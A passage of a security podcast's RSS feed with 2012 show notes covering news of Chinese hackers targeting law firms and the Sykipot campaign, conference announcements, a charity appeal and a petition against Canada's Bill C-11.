<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The attackers also left additional clues allowing us to gain insight into what appears to be a staging server that is used prior to the delivery of new binaries to targeted users. In addition, we were able to confirm that the server was also used as a command and control (C&amp;C) server for a period of time as well. The server is based in the Beijing region of China and was running on one of the largest ISPs in China. Furthermore, on one occasion one of the attackers connected from the Zhejiang province. The server has hosted over a hundred malicious files from the past couple of months, many of which were used in Sykipot campaigns.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.bloomberg.com/news/2012-01-31/china-based-hackers-target-law-firms.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.bloomberg.com/news/2012-01-31/china-based-hackers-target-law-firms.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">China-based hackers looking to derail the $40 billion acquisition of the world&rsquo;s largest potash producer by an Australian mining giant zeroed in on offices on Toronto&rsquo;s Bay Street, home of the Canadian law firms handling the deal.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Over a few months beginning in September 2010, the hackers rifled one secure computer network after the next, eventually hitting seven different law firms as well as Canada&rsquo;s Finance Ministry and the Treasury Board, according to Daniel Tobok, president of Toronto-based Digital Wyzdom. His cyber security company was hired by the law firms to assist in the probe.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-582-dmarc-dhsbs-usb-fixers-skyipot-chinese-hack-lawyers/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3435/0/infosec-daily-podcast-episode-582.mp3" length="21128190" type="audio/mpeg" />
		<itunes:duration>0:43:58</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 582 for January 31, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Themson Mester and Dr. Bonez.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why d[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 582 for January 31, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Themson Mester and Dr. Bonez.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on http://www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; &#34;The Reunion&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://news.cnet.com/8301-27080_3-57367842-245/antiphishing-standard-in-the-works-from-google-facebook-others/
&#160;
Google, Facebook, Microsoft, Yahoo, PayPal and others are working together on a standard that can be used across the Internet for blocking phishing e-mails.
&#160;
The 15 companies will be announcing on Monday DMARC.org, which stands for Domain-based Message Authentication, Reporting, and Conformance&#8211;a system for verifying that e-mails are coming from legitimate companies and not imposters trying to trick people into clicking a phishing link. Basically, the system offers a common way for companies to authenticate their legitimate communications with customers.
&#160;
Also in the DMARC working group are AOL, Bank of America, Fidelity Investments, American Greetings, LinkedIn, and e-mail secur[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 581 &#8211; The Big Picture, HOIC, The Clanks, .ru Abused, &amp; No Click Pwnage</title>
		<link>http://www.isdpodcast.com/episode-581-the-big-picture-hoic-the-clanks-ru-abused-no-click-pwnage</link>
		<comments>http://www.isdpodcast.com/episode-581-the-big-picture-hoic-the-clanks-ru-abused-no-click-pwnage#comments</comments>
		<pubDate>Tue, 31 Jan 2012 01:59:21 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3429</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 581 for January 30, 2012.&#160;&#160; Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Karthik Rangarajan, and Beau Woods. &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John [...]]]></description>
			<content:encoded><![CDATA[<p><span id="internal-source-marker_0.6508371450083918" style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; font-weight: bold; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline;">InfoSec Daily Podcast Episode 581 for January 30, 2012.&nbsp;&nbsp; Tonight&#39;s podcast is hosted by Rick Hayes, </span><span id="internal-source-marker_0.0035412585784345696" style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Dave Kennedy, </span><span id="internal-source-marker_0.0035412585784345696" style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Karthik Rangarajan, </span><span id="internal-source-marker_0.6508371450083918" style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">and Beau Woods.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Subcommittee Markup: H.R. 3674, PrECISE Act of 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 1, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: 311 Cannon House Office Building, Washington, DC (also live streaming)</span><br />
	<a href="http://homeland.house.gov/markup/subcommittee-markup-hr-3674"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://homeland.house.gov/markup/subcommittee-markup-hr-3674</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;The Reunion&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.petitiononlinecanada.com/petition/canadians-against-bill-c11-the-copyright-modernization-act/362"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.petitiononlinecanada.com/petition/canadians-against-bill-c11-the-copyright-modernization-act/362</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Do you want to be labelled a criminal for copying songs off a CD that you have purchased onto your iPod? With the aforementioned bill, you will be&#8230;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The current Canadian government wants to pass Bill C-11 (of the formerly defunct Bill C-32) under the guise of modernization of our current copyright laws. What this bill fails to do is keep any modern consumer in mind.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">With the current language of the bill regarding &quot;digital locks&quot; or DRM to many of you, the passing of the bill label most of you criminals.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Potential criminals? With severe fines? for the following actions that many of the current generation of computer literate consumers do:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">- Copying a song off a CD that you have purchased to your iPod or cell phone to listen to on your commute to work?</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">- Copying a movie off a DVD or Blu-Ray that you have purchased to your cellphone or tablet to watch while waiting in line at the cash register?</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">- Copying a CD, DVD or Blu-Ray disc that you have purchased in order to prevent your young children from scratching the original disc? (something I&#39;m sure that has happen to many a parent including this one)</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Do these actions sound criminal to you?</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In our current economic climate, do most of us have so much disposable income that we can purchase the same song over and over again? In different formats so that we can listen to it in our car, iPod, cell phone, computer, and home stereo?</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Copyright modernization need to keep the modern consumer in mind, and need to include fair use and common sense.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Please make your voice against Bill C-11 known to the current Canadian federal government. You can start by signing this petition, and writing to the Prime Minister&#39;s office: pm@pm.gc.ca and the Industry Minister: </span><a href="mailto:christian.paradis@parl.gc.ca"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">christian.paradis@parl.gc.ca</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Geordy&rsquo;s Comments:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;It seems like the SOPA problem is worldwide. The world is not seeing the wool pulled over their eyes. &nbsp;I could not find a single news article that mentioned SOPA, ACTA and Bill C-11 and called them all out for the crock of shit they are.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Beau&rsquo;s Comments:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Yep, Spain just passed a similar bill with considerable pressure from the US. And from The Guardian: &ldquo;The UK and 21 other European Union member states on Thursday signed an international copyright agreement treaty called ACTA sparking more demonstrations by Internet users who have protested for days both virtually and physically over fear it will lead to online censorship.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
